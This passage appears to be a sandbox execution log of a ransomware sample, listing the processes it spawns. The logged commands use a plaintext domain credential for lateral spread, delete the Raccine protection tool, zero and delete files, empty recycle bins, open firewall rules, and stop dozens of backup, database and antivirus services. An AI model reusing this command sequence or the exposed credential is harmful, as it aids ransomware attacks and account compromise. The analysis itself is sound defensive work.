- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:6224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.10 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:4588
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:6280
- C:\Users\Admin\AppData\Local\Temp\g5nbopzl.exe
  "C:\Users\Admin\AppData\Local\Temp\g5nbopzl.exe" \10.10.0.10 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
  2⤵
  PID:6868
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:6072
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5264
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:6176
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
  2⤵
  PID:6924
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:6460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:5644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:6696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:7008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:6940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:6432

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:4808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:4848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:4764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:7084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:7076

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:5704

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:212
- C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
  "2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
  2⤵
  PID:4904
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:6408
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:6320
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:6348
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:3120
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4928
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:6668
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:4996
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:272
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:264
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:256
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:6792
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:6060
- - C:\Windows\system32\net.exe
    "net.exe" start FDResPub /y
    3⤵
    PID:5628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start FDResPub /y
      4⤵
      PID:6080
- - C:\Windows\system32\net.exe
    "net.exe" stop bedbg /y
    3⤵
    PID:6904
- - C:\Windows\system32\net.exe
    "net.exe" start Dnscache /y
    3⤵
    PID:6932
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4396
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5916
- - C:\Windows\system32\net.exe
    "net.exe" start SSDPSRV /y
    3⤵
    PID:4760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start SSDPSRV /y
      4⤵
      PID:3800
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:4804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:2580
- - C:\Windows\system32\net.exe
    "net.exe" start upnphost /y
    3⤵
    PID:4344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start upnphost /y
      4⤵
      PID:4380
- - C:\Windows\system32\net.exe
    "net.exe" stop EhttpSrv /y
    3⤵
    PID:6756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:5376
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5364
- - C:\Windows\system32\net.exe
    "net.exe" stop MMS /y
    3⤵
    PID:6640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:7032
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:7024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:5236
- - C:\Windows\system32\net.exe
    "net.exe" stop ekrn /y
    3⤵
    PID:6052
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:4600
- - C:\Windows\system32\net.exe
    "net.exe" stop mozyprobackup /y
    3⤵
    PID:6324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:1036
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:4824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:4748
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:5616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:4796
- - C:\Windows\system32\net.exe
    "net.exe" stop EPSecurityService /y
    3⤵
    PID:4436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:4972
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:7148
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:5560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:1044
- - C:\Windows\system32\net.exe
    "net.exe" stop ESHASRV /y
    3⤵
    PID:4616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:2384
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPS /y
    3⤵
    PID:4272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:6948
- - C:\Windows\system32\net.exe
    "net.exe" stop SDRSVC /y
    3⤵
    PID:1328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:4276
- - C:\Windows\system32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:4124
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:5768
- - C:\Windows\system32\net.exe
    "net.exe" stop EPUpdateService /y
    3⤵
    PID:196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:1176
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:4000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:1264
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:1020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:5900
- - C:\Windows\system32\net.exe
    "net.exe" stop FA_Scheduler /y
    3⤵
    PID:3976
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:4504
- - C:\Windows\system32\net.exe
    "net.exe" stop ntrtscan /y
    3⤵
    PID:4908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:5508
- - C:\Windows\system32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:4188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:6032
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:2632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:2680
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:4036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:2684
- - C:\Windows\system32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:4628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:4284
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:4432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:4756
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:7156
- - C:\Windows\system32\net.exe
    "net.exe" stop EsgShKernel /y
    3⤵
    PID:6960
- - C:\Windows\system32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:4176
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:6260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:6952
- - C:\Windows\system32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:4968
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:6796
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFS /y
    3⤵
    PID:4448
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLWriter /y
    3⤵
    PID:5756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:2308
- - C:\Windows\system32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:1624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:2208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Enterprise Client Service” /y
      4⤵
      PID:5848
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:5180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:4840
- - C:\Windows\system32\net.exe
    "net.exe" stop klnagent /y
    3⤵
    PID:5568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:7096
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:2248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:6716
- - C:\Windows\system32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:6728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:6068
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFSGT /y
    3⤵
    PID:6312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:7116
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:3672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:5316
- - C:\Windows\system32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:6624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SavRoam /y
      4⤵
      PID:6308
- - C:\Windows\system32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:268
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:4252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:1680
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:6420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:6244
- - C:\Windows\system32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RTVscan /y
      4⤵
      PID:6400
- - C:\Windows\system32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:5684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:4288
- - C:\Windows\system32\net.exe
    "net.exe" stop macmnsvc /y
    3⤵
    PID:4236
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:6088
- - C:\Windows\system32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:4560
- - C:\Windows\system32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:4196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:4800
- - C:\Windows\system32\net.exe
    "net.exe" stop kavfsslp /y
    3⤵
    PID:6468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop kavfsslp /y
      4⤵
      PID:5344
- - C:\Windows\system32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:5824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:6640
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:5060
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:6112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:4760
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:6756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:2004
- - C:\Windows\system32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:4376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:5528
- - C:\Windows\system32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:4368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:6160
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeEngineService /y
    3⤵
    PID:4796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:5524
- - C:\Windows\system32\net.exe
    "net.exe" stop masvc /y
    3⤵
    PID:5836
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:4892
- - C:\Windows\system32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:5896
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:1044
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:4972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:4552
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:4304
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:4652
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:1300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:6208
- - C:\Windows\system32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:6448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:1684
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:6948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:5764
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:5080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:4440
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:5212
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:6252
- - C:\Windows\system32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:1876
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4656
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:2076
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:5164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:5348
- - C:\Windows\system32\net.exe
    "net.exe" stop MBAMService /y
    3⤵
    PID:4820
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBAMService /y
      4⤵
      PID:4316
- - C:\Windows\system32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:3820
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:2704
- - C:\Windows\system32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:5520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:5476
- - C:\Windows\system32\net.exe
    "net.exe" stop “Acronis VSS Provider” /y
    3⤵
    PID:3300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
      4⤵
      PID:7088
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamMountSvc /y
    3⤵
    PID:6000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:1408
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:5544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:4508
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer /y
    3⤵
    PID:4244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:4460
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:6180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:6684
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLSERVER /y
    3⤵
    PID:3312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:6460
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFramework /y
    3⤵
    PID:7092
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:5576
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:4392
- - C:\Windows\system32\net.exe
    "net.exe" stop IISAdmin /y
    3⤵
    PID:5312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:6952
- - C:\Windows\system32\net.exe
    "net.exe" stop MBEndpointAgent /y
    3⤵
    PID:4192
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:5104
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:5248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:4608
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:5356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:4784
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:6796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:6840
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeES /y
    3⤵
    PID:2288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:5256
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:4268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:5676
- - C:\Windows\system32\net.exe
    "net.exe" stop mfefire /y
    3⤵
    PID:2204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:6584
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:7140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:5380
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Agent” /y
    3⤵
    PID:6068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Agent” /y
      4⤵
      PID:5044
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:6740
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:5644
- - C:\Windows\system32\net.exe
    "net.exe" stop EraserSvc11710 /y
    3⤵
    PID:6308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:6244
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL57 /y
    3⤵
    PID:7116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL57 /y
      4⤵
      PID:6828
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:284
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:6660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:7108
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:6156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:7152
- - C:\Windows\system32\net.exe
    "net.exe" stop mfemms /y
    3⤵
    PID:6624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:4188
- - C:\Windows\system32\net.exe
    "net.exe" stop McShield /y
    3⤵
    PID:4432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:6236
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:5484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:4228
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQL Backups /y
    3⤵
    PID:6908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQL Backups /y
      4⤵
      PID:7036
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:5984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:5684
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer100 /y
    3⤵
    PID:6204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:7124
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:5928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:7048
- - C:\Windows\system32\net.exe
    "net.exe" stop RESvc /y
    3⤵
    PID:4996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RESvc /y
      4⤵
      PID:6348
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:3908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:4804
- - C:\Windows\system32\net.exe
    "net.exe" stop NetMsmqActivator /y
    3⤵
    PID:5384
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:4600
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL80 /y
    3⤵
    PID:6868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      PID:1532
- - C:\Windows\system32\net.exe
    "net.exe" stop “Enterprise Client Service” /y
    3⤵
    PID:1624
- - C:\Windows\system32\net.exe
    "net.exe" stop mfevtp /y
    3⤵
    PID:5324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:6324
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:6772
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:4572
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:6148
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeIS /y
    3⤵
    PID:4856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:2384
- - C:\Windows\system32\net.exe
    "net.exe" stop McTaskManager /y
    3⤵
    PID:4568
  - - C:\Windows\system32\net1.exe
